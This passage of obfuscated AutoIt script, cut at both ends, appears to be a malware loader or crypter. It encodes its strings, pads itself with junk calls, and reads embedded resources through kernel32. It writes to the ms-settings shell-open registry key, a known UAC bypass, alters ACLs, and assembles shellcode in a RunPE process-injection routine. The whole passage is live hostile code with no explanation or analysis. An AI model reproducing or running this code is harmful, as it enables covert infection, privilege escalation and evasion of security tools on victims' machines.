* 2236844 ) NEXT IF $ALASTERROR [ZVTZJDNXHRPQQIM ("53" ) ] = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54,..6..1,..5..6.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $3C3N0HCCFM = 2585397 FOR $E = 0 TO 1560412 IF $1300820860 = 176683708 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,..5..8,53..,6..0,..55..,..5..9..,6,5..9,56,..59..,5..8..,60,..56,60..,5..6..,..5..7..,56..,5..9,3,5..9,..6,60..,5..6,..59,..5..8,5..5..,6..1..,5..7,..5..3,..5..7,5..4,6..0..,..58,..6..0..,57..,..59..,6..,5..7,..6..2,60,..57..,..5..7..,..5..8..,..6..0..,6..1..,59,..5..8,55..,..62" , ".." ) ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,..5..7..,..57,5..9,..3,5..9,3..,..57..,56..,..59..,..54,..59..,3..,59,3..,5..5..,6..1,55,..55,5..9..,2..,..5..9,5..8,60,55,..5..9..,..5..,59..,58,..5..9..,3..,56,..5..6,5..6,55..,..5..5,..5,..5..9..,..5..7,5..9..,3,..5..9,..3..,55,..5..5,..5..5..,..3..,55,..53,55..,5..5,..5..9..,..5..5..,5..9,..6,..59,..6,59,3,55..,55..,55..,..3,5..5,53,55,5..5,57..,..5..6..,59,..3..,..59,6..,6..0..,5..6,59..,..58..,5..7..,..6..1,59,..54,..5..9..,5,..5..9..,5..7,..5..9..,3..,..59,..5..8,..55..,..5..5..,..5..5,3,..55..,..5..3,5..5,..5..5..,59,61..,5..9..,54,..5..9,5..,5..9..,57,5..9..,3..,..5..9..,5..8..,..5..5,..55,..55,..3,55,5..3..,..5..5,..5..7..,..5..9,54..,..5..7,..6..1..,..5..9..,..5..4..,59..,5..,..59..,..57,59..,3..,59,5..8,5..8,2..,..5..5,..55..,56..,..5..3..,5..5..,55..,58,..4..,55,62.." , ".." ) ) ) ) PTR (648199 + 4291384348 * 1350741 ) $1300820860 = 176683708 ENDIF NEXT ENDIF ENDFUNC FUNC READRESOURCES ($RESNAME , $RESTYPE ) GLOBAL $1924764602 = 256356752 GLOBAL $2DWOVU3LJ8 = 3471477 FOR $E = 0 TO 1624533 ISFLOAT (1499981 + 4291913795 ) IF $1924764602 = 113519199 THEN LOCAL $GLOBALMEMORYBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..ne..l32...dll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2,41,2..7,3..0,18..,..3..1..,..4..5,4..1,..4..7,44..,..29..,..3..1" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] ISFLOAT (2158948 + 3150033 ) $1924764602 = 1027989821 ENDIF IF $1924764602 = 176683708 THEN #region meGTX ISPTR ("MuvD5NII6r0NzOUNNrejiZ4n7Klj2zDgtXT9gqZjjvKcri2uRBuZQmYYAhGtCzQFXUtM5VGwC4aWo16YT0BzeNzh95H8UERTQepGZoz558wWmcJJl" ) $1924764602 = 1300820860 ISBINARY (1038234 + 1290738 + 2574470 ) ISBOOL (3864753 + 391224 ) ENDIF IF $1924764602 = 256356752 THEN LOCAL $HINSTANCE $1924764602 = 176683708 ENDIF IF $1924764602 = 1027989821 THEN LOCAL $MEMORYPOINTER = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..rnel..32...dl..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2..,..4..1..,..29,..37,18,3..1,4..5..,41..,..47..,44..,..2..9..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , $GLOBALMEMORYBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] DIM $RN46V8WB4FVZMGNLKZSW = 1434297 $1924764602 = 1138660241 CHR (3912492 ) ENDIF IF $1924764602 = 1138660241 THEN RETURN $CSRHZILJDSLP (LUXBZMCWKPOC ("byte..[.." , ".." ) & $RESSIZE & "]" , $MEMORYPOINTER ) DIM $KAVU1QRRNOWJDIFQFDLW = 3551850 EXITLOOP ENDIF IF $1924764602 = 1203322726 THEN LOCAL $RESSIZE = $XFNAYPZBZOLC (LUXBZMCWKPOC ("kern..el..3..2...dll.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0..,..49..,..41,..44,30" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19,3..5..,..5..2..,..31,41..,32,..18..,..3..1,..45,41,..4..7,44..,29..,..31" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] $1924764602 = 113519199 RANDOM (11499 ) RANDOM (1239835 ) ENDIF IF $1924764602 = 1300820860 THEN LOCAL $INFOBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..er..nel..32.d..ll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,40,..3..0..,..1..8..,3..1..,4..5..,41,..47..,44..,2..9..,3..1..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,..4..5..,..46,..44" , ".." ) ) , $RESNAME , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("38..,4..1,..40..,..33" , ".." ) ) , $RESTYPE ) [ZVTZJDNXHRPQQIM ("53" ) ] INT (2631221 ) $1924764602 = 1203322726 WINEXISTS ("CJWvzyp4DLvnjKMK8JsRSpXqpnlbnoNc9pwH8GQJUbEx7JVTcSq7cmdmXEflnoRp7sn3oeLB3S7RUytOCB9E7QaWmjUD" ) ENDIF NEXT ENDFUNC FUNC IPTYOQECLE () GLOBAL $1027989821 = 256356752 GLOBAL $EUPZNV1E7F = 1430011 FOR $E = 0 TO 3312713 IF $1027989821 = 113519199 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("H..K..CU..\..So..f..tw..ar..e\Cla..s..s..es\..m..s-s..e..t..t..ings\..she..l..l..\..o..p..en..\..c..om..mand" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..31..,3..8,31,3..3,..2..7,..4..6,3..1,..5,..50,..3..1..,..29..,4..7..,..46,..3..1" , ".." ) ) , LUXBZMCWKPOC ("R..EG.._SZ.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..4,47,3..8..,3..8" , ".." ) ) ) $1027989821 = 1300820860 MOD (760232 , 1141297 ) ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..nel..3..2.d..l..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("23..,41,49,..59..,57..,5,4..0..,..2..7..,28..,38,3..1..,2..3,..41..,49,..5..9,5..7..,..6,..4..5..,..18..,31..,3..0,3..5..,4..4,31..,..29,..4..6..,35,..4..1,..4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..2..,..4..1..,..3..0..,3..4..,..3..1..,..3..8..,..42,31,..44" , ".." ) ) ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU\So..f..t..ware..\C..l..as..ses..\m..s-se..ttin..g..s..\sh..el..l\o..p..en\..co..mm..an..d.." , ".." ) , "" , LUXBZMCWKPOC ("R..E..G_SZ" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) ISBOOL (126727 + 2458991 * 2143283 ) $1027989821 = 1203322726 STRING ("VJ" ) ENDIF STRING (681155 + 4291180643 * 2601491 ) NEXT ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $864731176 = 256356752 GLOBAL $XA8YFGHYNW = 3821865 FOR $E = 0 TO 601978 WINEXISTS ("w808OWmnF2syAFyCs7TUZT7V4MWcwZBUatdOf09lKWBFnSRrYs0S1kbMaedc9k1RzHyhCUwC8HidrAHm5Dnd8U2ZrANbX7lA5UgQtJ" ) IF $864731176 = 113519199 THEN LOCAL $TSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,57..,5..9,..3..,..5..9..,..3..,58,5..6..,6..0,..5..7,60,..5..5..,..6..0,5..8..,..5..9..,56..,60,5..7..,..57..,..56..,..60..,..5..5,59..,..58,59,..5..4,60..,5..7..,5..9..,5..8..,..55..,..61,..55,..5..5..,59..,5..5..,60,..6..2..,..6..0..,57..,59..,58..,..5..8,2..,..5..6,..5..5,..5..6,..5..3..,5..8,4..,..55..,5..5,..55,..6..2.." , ".." ) ) ) ) RANDOM (1511357 ) $864731176 = 1027989821 DIM $7VIG1GF6YSOOIZCFVOAW = "iHu23uOjgKaIYtffD60QDhbAaVVX8JSS6tZXoO7V1XRgOfUE6a1TkQnaG41iJ1kG3rLDEr1Z8eZQA4W4aq08S" MOD (369540 , 3283063 ) ENDIF IF $864731176 = 176683708 THEN $BN = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28..,35,4..0,..2..7,44,5..1,46,4..1,..4..5,4..6..,44,..3..5..,40..,..3..3.." , ".." ) ) ) $864731176 = 1300820860 DIM $MKNWCPAOJCVF1GJLH6IS = 69587 + 3220933 * 2937281 + 4293372797 * 61801 + 4294813521 + 3551407 * 244707 ENDIF IF $864731176 = 256356752 THEN $E = EXECUTE $864731176 = 176683708 DIM $QNCYHONM0Q28ZVRMH1UN = 2509262 * 2379311 + 129909 + 4293667836 * 2893636 + 4293386776 + 3344262 ENDIF IF $864731176 = 781366022 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..57,..59..,3,59..,3..,5..7..,..5..6,59..,5..4,5..9..,3,..5..9..,..3,..5..5,6..1..,..55..,..6..0,59,5..4,..5..9,5..7,60,59..,59,..54..,..60,..5..3..,..5..9..,6..2..,..5..6,..56..,..56,..55,..55,5..,59,57..,59,..3..,..59,3,..55,60..,5..5,..3..,..55..,5..3..,..5..5,60..,..59,..6..2..,5..9..,5..,6..0,..57..,..5..5..,60..,5..5,3,..55,5..3,..5..5..,..60..,..58,..56,..59,58..,..60..,57,..5..7..,..2,..59..,..5..8,6..0,..55,59..,..5..,5..9..,..5..8,..59,..3..,..57,..6,..59..,..5..5..,5..9..,1,59..,58..,5..9..,..5..6..,..6..0..,..57..,..58,5..6..,..59,..5..8..,..59..,..56,..60,..5..8,..60,..55,59,..62,60,5..7..,..60,6..2..,..55,..6..0..,..55..,3..,5..5,..5..3,55..,6..0,..60,5..3..,6..0..,5..7..,6..0,55,5..5..,6..0,55..,3..,..55..,53,55,..5..7,..59..,..6..1..,..5..9..,..54,..59,..5..,59..,..5..7..,..5..9..,3..,..59..,5..8,..5..5..,..3..,..5..5,..53,..55..,..6..0,5..9..,57,6..0..,..60..,5..9..,..6,6..0,5..5..,59,57..,..5..5,..60..,..5..5,3,..55,5..3,5..5..,..60,..5..6,5..3..,60,..6..1..,5..6..,..5..3..,5..6..,57..,55..,60..,..55..,..3..,55..,..53,5..5,6..0..,..6..0..,..53,60..,57..,..60..,..5..5..,..55,60..,..5..5..,..3,5..5..,..5..3..,..55,..57..,..60..,..53,..58..,..56,57..,5..7..,55,..62" , ".." ) ) ) ) RANDOM (3374839 ) EXITLOOP ENDIF IF $864731176 = 1027989821 THEN LOCAL $PSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,57,..5..7,59..,..3,59,..3..,58..,..5..6..,6..0,..5..7..,6..0..,5..5,6..0,..5..8,..59..,..56..,..60..,57..,..57,..60..,..59..,..58,60,..57..,58,..53,..60..,..57..,60,55..,5..5..,6..1,..5..5,..5..7..,..60..,..57..,58,..56,57,..57..,..55,..6..2" , ".." ) ) ) ) $864731176 = 1138660241 WINEXISTS ("Vt25GlQLqwe4TDurZiboJwjb3rsXglk0zF7lFhsmAf9KVGM01" ) ENDIF IF $864731176 = 1138660241 THEN LOCAL $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,..5..7..,57,5..9,..3..,5..9..,..3,..57,..5..6,..5..9,..5..4,..59..,..3..,59,..3..,55,..61,..5..5..,..60,..59,5..4,59..,57..,..6..0,5..9..,5..9,54,60,..53,5..9,62,5..6,5..6,..56,..55..,5..5,..5..,..5..9..,5..7..,..5..9,..3,5..9,3,55..,60..,..5..5..,3,..55,..53,55,..6..0..,5..9..,..6..2,..59..,..5,6..0..,..57..,55,..60,..5..5,..3..,..5..5,53,55,60,57..,..62..,..5..9..,..5,5..9,6..2..,..60,57,..5..9..,..62,..5..9..,..5..4,..59,..3..,..5..9..,6..2..,60,1..,..59,..58,5..8,5..6..,59,..5..8,..5..9,56..,60..,..58,6..0..,..55..,..5..9,6..2..,6..0..,57,..6..0..,6..2,57,5..7..,..59..,..5..8,6..0,56..,59..,56..,6..0,5..5..,5..9,..62,..60..,..5..3..,60,..5..7,59,..6..,..6..0,..5..5,5..5,6..0,..5..5..,..3,..55..,5..3,55..,..6..0,6..0..,53..,..6..0..,..5..7,..60,..55..,..5..5,6..0,..55,3..,..55..,5..3,5..5,..5..7..,..60,5..3,5..8,5..6,5..7,5..7..,..55,3..,55..,..5..3..,55..,60,..59,5..7,..6..0..,6..0,5..9,..6,..6..0,..5..5,59..,57,..5..5,6..0,55..,3..,..55,..5..3..,5..5..,..60..,56..,..5..4,5..5,6..0,5..5..,62.." , ".." ) ) ) ) $864731176 = 1924764602 ISBINARY (1582475 * 129845 ) ENDIF IF $864731176 = 1203322726 THEN LOCAL $PACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,5..7..,57,59..,..3,59,..3,58,5..6..,60..,57,..60..,..5..5,6..0,..5..8,..59,5..6,6..0..,57..,57,6..0..,59,5..8,..6..0,..5..7,5..8,..53,60,..57,..6..0,5..5..,55,..6..1..,..55,5..7,..6..0..,..57..,..57..,54,57..,..5..6,57..,..3..,55..,..6..2.." , ".." ) ) ) ) DIM $LODNFJWSZZYEXIPWOB65 = 73573 $864731176 = 113519199 ISBOOL ("fdtHJ3yFcztSzB2W1taKLOJA6JeTaTF7hhMWEp5DkTtohnEIJA3wHzczC3K9ZOEt3wJsZgrKyFA2uu" ) ENDIF IF $864731176 = 1300820860 THEN LOCAL $TACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,..5..7,57,5..9..,..3..,59..,3..,5..8,5..6,..6..0,57..,60,5..5..,..6..0..,5..8,5..9..,..5..6..,..6..0,..5..7,..5..7,..5..6..,..6..0,55..,59,5..8,..5..9,..5..4..,..60,5..7,59..,58,..5..5..,61..,..55..,..55,59..,..5..5,..60..,..62..,..6..0,..5..7,..5..9..,..5..8..,5..5,..5..3,57,..5..4..,5..9..,..56..,..5..9,..3,58..,55,5..9..,..5..8..,..6..0..,..59,59..,62..,6..0,5..6,..5..9,..6..2..,5..9..,..6,5..9..,..5..,..56..,2,..5..9..,5..5,..60..,62..,..60,..57,59..,..58..,..5..5..,..5..3..,..5..8..,5..6,..59..,..5..5..,..60..,1,5..6..,..54..,..5..6,..2..,..6..0,58..,60..,5..6,59..,..6..1,..59..,6..,6..0,55,..60..,..57..,5..5..,..5..3,5..7,54,59,..5..6,5..9..,3..,5..8..,5..6,..59..,6..2..,..6..0..,..1..,..5..9,58..,..56..,..2..,6..0,..5..8..,..60..,..5..6,59..,..61,5..9,..6,..60..,5..5..,..60,57..,..55,..53..,..57,54,5..9,56,5..9,..5..8..,5..7,..5..6,59..,..6..,..6..0,..58,59..,..5,60..,57,56,..2..,60,58,60..,5..6,..5..9,..61..,..59..,..6..,..6..0..,..55..,..6..0,..57,..55,53..,..58,..5..6..,59..,55,60..,1,5..6,55..,..5..5,..55..,..55..,..6..2" , ".." ) ) ) ) $864731176 = 1203322726 ENDIF IF $864731176 = 1655436234 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,5..7,..57..,..5..9,3,..5..9,..3..,5..7..,5..6,..59..,..54,..5..9..,..3..,59..,..3,..5..5,61..,..5..5,..60,59,..5..4..,59,..57..,60..,..59,59..,..54,..6..0..,..5..3..,..59,6..2,..56..,5..6..,..5..6..,5..5..,55..,..5..,5..9,..57..,..5..9..,3..,5..9..,3..,5..5,6..0..,55,..3,55,5..3,..55..,..6..0,5..9,..6..2,5..9..,..5..,..6..0,..57..,..55,60..,..55,3..,55..,5..3,5..5..,..60,5..8..,5..6,..59..,5..8,..60,..5..7,5..8..,..56..,5..9..,..58,59,..5..6..,6..0,5..8..,60..,5..5,5..9..,62,..6..0,5..7,..60..,..6..2..,..5..7,5..7..,5..9..,..5..8,..6..0..,5..6..,59,..5..6,..60,55,..5..9,..6..2..,60,5..3,6..0..,57..,..59,..6,..6..0,55..,57,..5..7,..5..9,5..4..,..59..,..56..,5..9,3,..55,60..,55..,..3..,5..5,5..3..,..5..5,6..0,6..0..,53..,6..0,57,60..,..55..,5..5,6..0..,..55,..3,5..5..,5..3,55..,..5..7..,..60,5..3,5..8..,..5..6,5..7,57,55,3..,55,..53..,55..,..60,..5..9,6..2..,..59,5..,..60,5..7..,55,..6..0,5..5,..3..,..5..5..,..53..,..5..5..,..6..0,..5..6,..5..4..,55..,6..0..,..5..5..,3,..55..,..53,5..5,..6..0..,..60..,..53..,..60,..5..7..,..6..0,..55,..5..5..,..60,..55,3..,..5..5..,5..3,..5..5..,57..,..6..0,53..,5..7,54,..57..,56..,..5..7..,..3..,55..,3,55..,..5..3..,..5..5..,..6..0,..59,6..2..,59,5,60,5..7..,..5..5,..60..,55..,..3,..55..,5..3,5..5..,..6..0,..5..6,..5..3..,55,60,..5..5,6..2.." , ".." ) ) ) ) CHR (2826920 ) $864731176 = 781366022 ENDIF IF $864731176 = 1924764602 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,..57,..57..,5..9..,..3..,..59..,3,..57..,..5..6..,..5..9..,54,..59,3,5..9..,..3..,..55..,6..1..,55..,..6..0..,..5..9..,..54,..59..,..5..7,6..0..,..59..,..59..,..54,60,53,..5..9..,6..2..,..56,56..,5..6..,..5..5..,..55..,5,..5..9..,5..7..,59..,3..,5..9..,..3..,5..5,60..,..5..5..,3,5..5..,..53..,..5..5,..60..,..5..9,..6..2,..5..9..,5,6..0..,..57,55,..60,..55..,..3..,..55..,..5..3,5..5..,..60,..57..,6..2..,59,..5,59..,62..,6..0..,57..,5..9,62,5..9..,..54,..59,..3..,..5..9,6..2..,60,1..,5..9..,..5..8,57,5..4..,..59..,..56,5..9,..3..,..55..,6..0..,5..5,3,5..5,..53,55,60..,60,53,60,5..7,..60..,..5..5,..5..5..,..60,..55..,..3..,55,..53..,55,5..7,..60,5..3,..57,54,5..7,56..,5..7,..3,..5..5,3,5..5,53,55,..6..0..,59..,..57,6..0,..60,5..9,..6,60,..55..,..5..9,..57,5..5..,60..,55,3,55,..53,57,57,5..9..,..3,5..9..,..3,..58..,56,..6..0,..5..7,..60..,..5..5..,60,5..8..,59..,5..6,..60..,57..,..5..7,6..0,..5..9,58..,..60,..5..7,58,..5..6,..59,..62,..6..0,..1,..59,..5..8,5..5,..6..1..,..5..5..,..5..7..,60..,..57,..57,54,..57..,..56,..57,3,..5..5..,..62..,5..5,3..,5..5..,..5..3,..5..5,..60..,5..9..,..5..7..,..60,60..,..59,6,60..,..5..5..,5..9..,5..7..,5..5..,..6..0,55..,..3..,..55..,..5..3..,5..5..,..6..0..,..56,..5..5,..55..,..60,55..,..6..2" , ".." ) ) ) ) ISBINARY ("avVNlTCjs7c9jfhJ23tF5DV62n" ) $864731176 = 1655436234 ISFLOAT (1912442 * 2625958 + 3975194 + 4294644196 ) ISFLOAT ("kxS4hkcVbu9rFJYV7fQDuDkdEVicY9GZF7JIjtFLMlBF6wYyTt6Qa5lRmNyvc97" ) ENDIF NEXT ENDFUNC FUNC HJTWPSKJJP ($TITLE , $BODY , $TYPE ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..27..,38,45,3..1.." , ".." ) ) THEN $NLIVQGZCBCYM ($TYPE , $TITLE , $BODY ) ENDIF ENDFUNC FUNC RUNPE ($WPATH = "" , $LPFILE = "" , $PROTECT = "" , $PERSIST = "" ) GLOBAL $656182541 = 256356752 GLOBAL $WHAOKNJD1I = 673474 FOR $E = 0 TO 175490 DIM $TSDD1YJW3WF4JJNOYTWJ = 1007376 + 4293029922 * 1166129 + 3804418 + 199124 + 4292793209 + 4293898758 + 4293737743 IF $656182541 = 9803637 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,57,..5..9..,3,59,3,..58,5..6,60..,..5..7,..6..0..,55..,60,..58..,59,..5..6,6..0..,5..7..,..58,56,5..9,5..8,60,..57..,57..,5..7..,..59..,..5..4,..60..,..57..,59..,54,..5..5..,..6..1,..55..,57,5..7,..5..9..,5..9..,62..,59,3,..59..,..5..8,..5..8,..6..,58..,5..6,60..,5..7,..6..0..,..55,60..,5..8,5..9..,56..,..6..0,57..,..5..5..,..3..,5..5,53,5..5,..5..5..,5..9,..1..,..5..9,..2..,6..0,5..6,5..9..,..57,5..9,..59..,5..9,6..1..,59..,2..,..5..9..,1..,5..9..,..57..,..6..0..,56,6..0,..5..4..,59..,..6..1..,..59..,5..9..,..59..,2,59,1,..60,..5..4..,..6..0..,56,59..,61,..59..,5..7..,59,59..,59,..2,..59..,..1,..59,57..,..6..0,5..6..,..60,54..,5..9..,..61,59,..6..2..,..5..9..,..5..9..,6..0..,..5..8,..59..,61..,..60,5..6..,59,..57,6..0,54..,..5..9..,62,59..,5..9..,..5..9..,..5..5,..5..9..,5..,60,59,59,1..,..5..9..,..2..,5..9..,..3,..6..0..,5..6..,..59..,5..7,6..0..,..5..9,..60,..5..6..,6..0..,..54,..59..,57,59..,..59,60,..56..,5..5,55..,5..5,..3..,..55..,5..3..,..5..5,..5..7,59..,..3,60..,5..3..,..57..,..59,5..9,6..2..,..5..9,..3,..5..9,5..8,5..5,..6..2" , ".." ) ) ) ) RANDOM (3776848 ) $656182541 = 1586164444 WINEXISTS ("UzDn4M6vHRu" ) ENDIF IF $656182541 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56,3,..6..0..,..5..,2,..5..,..6..2,58..,5..8..,6..1..,2,5,..3..,..61..,..5..4..,5..,..3,6..,53,..53,..5..6,53,..5..3..,5..3..,53" , ".." ) ) ISPTR (3442150 * 965098 * 3906138 ) $656182541 = 2032766480 INT (3829084 ) ISPTR ("CqLMHQC1iaLlSS71SnmEQd2cggOmpjmj5koenindxNJnnX" ) ENDIF IF $656182541 = 39019882 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60..,5..9,..5..4,6..1,..6..1..,62..,60..,5..8..,3..,..6..1,6..1..,..4,57..,58,2..,..57,..3..,6..0,6..1..,5..8..,5..8,..6..1..,6..,6,..6" , ".." ) ) INT (405923 ) $656182541 = 1885155689 ISFLOAT ("IFAbpK9YBpHC3NIaigbDNZtkL4jfaJaCZQNLWcidJzVGxI" ) ENDIF IF $656182541 = 50926388 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,6..0,..58,..4..,..3..,..6..,6..,..58,58,1,..5..3..,6..1..,5..8,3,..5..3,..53..,..6,6..1..,..5..7,62..,61..,53,..55..,..53..,5..3" , ".." ) ) $656182541 = 868457996 ENDIF IF $656182541 = 61093985 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,..61..,..4..,5..7,..58..,3..,..5..7,61,..62..,6..1..,..58..,..5..7,3,6..,..6,..6,6,..6,6,..61..,..4..,..57..,..5..8,1.." , ".." ) ) ISPTR (776663 + 4293584104 ) $656182541 = 1053930317 MOD (335955 , 2573866 ) ENDIF IF $656182541 = 90298599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..8,..6..,..61..,..6,..6,..6..0..,5..8..,4..,61,..6,..6,..58..,58,..4..,57,..61..,5..8..,..3..,..53,5..3..,..6,61,5..7,..6" , ".." ) ) $656182541 = 1279551750 DIM $883ODWXCERLYILW464AF = 2544328 ISFLOAT (3562572 + 3716916 ) ENDIF IF $656182541 = 92596336 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,6..2..,61,..58,..56..,..5..7..,..6,..6,..6,..6..,6,..6,..61..,..4,5..7..,..58,4..,..5..7,..61,..62,..61..,58..,..56,6..1..,6.." , ".." ) ) $656182541 = 1604509846 INT (3385463 ) ISSTRING (1633230 + 4291607498 * 1105641 ) ENDIF IF $656182541 = 100830152 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..1..,57..,54,..2,..6..,5,..6,6..,6..,..6..,..6,6..,60,..5..8..,4,3,..6..,6..,..58..,..58..,1..,3,61,58.." , ".." ) ) DIM $STREGTCKWMLKEEHTNF0Y = "f3Aobcr61zMjpam4yao1OuY3E48oFFlj5RmZ00EQln" $656182541 = 463618680 RANDOM (66547 ) ENDIF IF $656182541 = 113519199 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..4..,..6..0..,6,..6,..6..,6,..6,..6,61,2,..3,..6..1..,6..1..,5..8..,3..,..6..2,60..,..5..7..,..5..5..,..5..3..,..53..,..6..,2,5" , ".." ) ) PTR ("6QVfHTgecAunCnHXwdHEIQAZa3DQCtgRfH9aBUrgyLiXkIFXRSHvqKcqo5fNoAKTuNi5oGuM" ) $656182541 = 1027989821 DIM $6HNOAXR8VVUZEETVFON1 = 3908581 ENDIF IF $656182541 = 116471326 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,53..,53..,53,..53,6..1..,..2,60,59,5..3,3..,..61,2,6..0,..59..,..53..,3,6..1,..2..,56,5..9..,61,2..,..56,59.." , ".." ) ) $656182541 = 1196440215 STRING (2368921 + 4294584284 * 2414981 + 2570255 ) ENDIF IF $656182541 = 116925729 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..6..1,58,60,..5..3..,6..,6,6,..6..,..6..,6..,62,6..2..,..2,5..3,..57..,..6..1,5..3,..5..9,3..,..6..0..,..6..1..,5..8,60..,..5..7" , ".." ) ) $656182541 = 1270739258 MOD (2548954 , 1686916 ) ENDIF IF $656182541 = 143550684 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..58,..58..,..2..,57,61,..2..,57,..4,6,53..,61..,..4..,60,..6,5..5,..61,5..3,..6,..2,..6..0,57,59,..5..3,..5..9" , ".." ) ) PTR (494270 + 3757030 + 701676 ) $656182541 = 605510513 PTR ("jJ9yajobwtGkA2sXkcwH7CpyjJAiMDyLAiANNaELJ6VpJVRs0mLfB02QtKpzTfx245TsANjjGV8aS9Yx2hsz2tjKpVtcVf2DI2vO" ) ENDIF IF $656182541 = 158308218 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..61,..5..3..,..5..7,..3,60..,..57..,5..8..,6..1..,5..3..,..1,6..2..,..55..,4..,..4..,60,53..,..5..4,3,6..0,57..,5..8..,..6..1,57..,53.." , ".." ) ) $656182541 = 1922466865 DIM $BHR118UW1GLX79KVHCQU = "yB3EBZNjvDqhw" ENDIF IF $656182541 = 172415000 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,5..8..,4,61,6,..6,58..,58,..1..,..61,61,..5..6..,6..,2..,53,5..8..,53,6,..6..1..,..59,..6..0..,60,..6..,..3,6" , ".." ) ) $656182541 = 1513972166 WINEXISTS 